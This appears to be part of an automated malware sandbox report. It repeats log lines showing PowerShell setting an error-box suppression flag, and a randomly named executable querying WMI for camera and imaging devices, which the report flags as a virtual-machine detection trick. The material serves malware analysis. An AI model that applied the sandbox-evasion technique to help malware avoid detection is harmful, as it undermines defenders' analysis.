Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
